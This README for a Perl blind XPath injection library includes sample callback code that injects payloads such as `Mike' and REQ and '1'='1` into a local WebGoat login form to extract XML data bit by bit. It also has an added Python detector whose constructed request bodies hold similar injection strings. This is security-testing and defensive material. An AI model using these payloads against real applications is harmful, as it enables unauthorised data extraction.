Blind XPath Injection

Based on the original work of Amit Klein

This is a library for testing blind XPath injection on vulnerable applications.
The library can extract a complete XML document or a portion of it. You need to identify the XPath injection yourself and implement it in your own main code, in the callback_blind_xpath function.
The library calls this function to extract each bit of the XML document. A part of an XPath expression is passed as the argument to the callback and must be merged into the initial XPath injection request.
The main code must be able to tell a positive response from a negative one and return 1 or 0 respectively to the library.
Sample main code that connects to a vulnerable application (a local OWASP WebGoat 5.2) is provided.

Part of the sample main code for WebGoat:

use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;

require("blind-xpath-lib.pm");
package BlindXPath;   # the callback must live in the library's package

# Target URL, XPath-injection query string and LWP::UserAgent object,
# set up in init() (body elided in this excerpt).
our ($URL, $xpathURL, $ua);

sub init {
  ...
  print "Webgoat initialization done\n\n";
}

# Oracle: the WebGoat response contains "11123" only when the injected
# predicate evaluated to true.
sub verify_result {
  my ($res) = @_;

  return 1 if ($res =~ /11123/);

  return 0;
}


# Called by the library with a partial XPath expression ($arg); splice it
# into the injection point, send the request and report 1 (true) or 0 (false).
sub callback_blind_xpath
{
  my ($arg) = @_;

  my $username = "Mike' and REQ and '1'='1";
  my $password = "test123";
  $username =~ s/REQ/$arg/;

  my $req = HTTP::Request->new(POST => "$URL?$xpathURL");
  $req->content_type('application/x-www-form-urlencoded');
  $req->content("Username=$username&Password=$password&SUBMIT=Submit");
  my $res = $ua->request($req);
  if (! $res->is_success) {
    print "Error : Unable to connect to WebGoat ($URL)\n";
    exit(1);
  }

  my $verify = verify_result($res->content);

  return $verify;
}


init();

blind_xpath_start();

The library accepts options to limit the scope of the injection. You can exclude some parts of the XML document, limit the depth of extraction, or start extraction from a specified node.
By default, every part of the XML document is retrieved, starting from the root and following each child node.
Remember that bit-by-bit extraction is request intensive: excluding parts of the XML document can significantly reduce the number of requests sent to the server.
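The two properties described above, a quoted string literal broken out of with a boolean predicate (the Mike' and REQ and '1'='1 shape of the sample) and a high volume of such requests from one client, are also what a defender can detect. The following Python is an added example for the detection side; it is not part of blind-xpath-lib or WebGoat. It scans constructed POST bodies of the WebGoat login form, flags form values that look like a spliced XPath predicate, and reports clients whose count of such requests suggests bit-by-bit extraction rather than a single tautology probe. The threshold, client addresses and request bodies are all constructed for the example.

```python
"""Detect boolean-based blind XPath injection attempts in form submissions.

Added defensive example; not part of blind-xpath-lib. It looks for the
"close the string literal, append a boolean predicate, re-close the literal"
shape of the README sample (Mike' and REQ and '1'='1) in decoded POST bodies
and, because bit-by-bit extraction needs one request per bit, also flags
clients that keep repeating such requests.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs

# A quote that closes the application's string literal, then a boolean
# operator, then (later in the value) a comparison operator. Case-insensitive
# because attackers vary the case of and/or to slip past naive filters.
INJECTED_PREDICATE = re.compile(r"""['"]\s*(?:and|or)\b.*?(?:=|<|>)""", re.I | re.S)

# A re-closing tautology at the end of the value, e.g. '1'='1 or "a"="a.
RECLOSING_TAUTOLOGY = re.compile(r"""(['"])(\w+)\1\s*=\s*\1\2\s*$""")

# Constructed sample of (client, urlencoded POST body) pairs, mimicking the
# WebGoat login form used in the README. Not captured from a real system.
SAMPLE_REQUESTS = [
    ("10.0.0.5", "Username=Mike&Password=test123&SUBMIT=Submit"),
    ("10.0.0.5", "Username=O%27Brien&Password=test123&SUBMIT=Submit"),      # benign apostrophe
    ("10.0.0.7", "Username=Mike%27+and+1%3D1+and+%271%27%3D%271&Password=test123&SUBMIT=Submit"),
    ("10.0.0.7", "Username=Mike%27+and+1%3D2+and+%271%27%3D%271&Password=test123&SUBMIT=Submit"),
    ("10.0.0.7", "Username=Mike%27+and+1%3D1+and+%271%27%3D%271&Password=test123&SUBMIT=Submit"),
    ("10.0.0.9", "Username=Mike%27+or+%271%27%3D%271&Password=x&SUBMIT=Submit"),  # single probe
]


def is_xpath_injection(value):
    """True if one decoded form value looks like a predicate spliced into a quoted literal."""
    return bool(INJECTED_PREDICATE.search(value) or RECLOSING_TAUTOLOGY.search(value))


def suspicious_params(body):
    """Return [(param, value)] for every field of a urlencoded body that trips the check."""
    findings = []
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if is_xpath_injection(value):
                findings.append((param, value))
    return findings


def scan_requests(requests, threshold=3):
    """Scan (client, body) pairs.

    Returns per-client hit counts, the individual findings, and the clients at
    or above `threshold` hits. The threshold is deliberately tiny for this
    constructed sample; extracting even a small document bit by bit produces
    hundreds of hits from the same client.
    """
    hits = defaultdict(int)
    findings = []
    for client, body in requests:
        for param, value in suspicious_params(body):
            hits[client] += 1
            findings.append((client, param, value))
    extracting = sorted(client for client, n in hits.items() if n >= threshold)
    return {"hits": dict(hits), "findings": findings, "extracting": extracting}


if __name__ == "__main__":
    report = scan_requests(SAMPLE_REQUESTS)
    for client, param, value in report["findings"]:
        print(f"{client}: suspicious {param}={value!r}")
    print("probable bit-by-bit extraction from:", report["extracting"])
```

The per-value check is the WAF-style signal and will fire on a one-off tautology login attempt as well; the per-client count is what distinguishes an extraction run, which is why both are reported separately.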

blind-xpath-lib.pm [v1.0]
Options
  -c       (Do not retrieve comments)
  -t       (Do not retrieve text nodes)
  -p       (Do not retrieve processing instructions)
  -a       (Do not retrieve attribute names)
  -A       (Do not retrieve attribute values)
  -n       (Do not retrieve node names)
  -d <0-n> (Depth of XML analysis. Default: 0 (= infinite))
  -s xpath (Starting node. Default: /node())
  -o file  (Write output to file. Default: stdout)
  -D       (Debug mode)
  -h       (Help)

Download blind-xpath-injection-1.0.tgz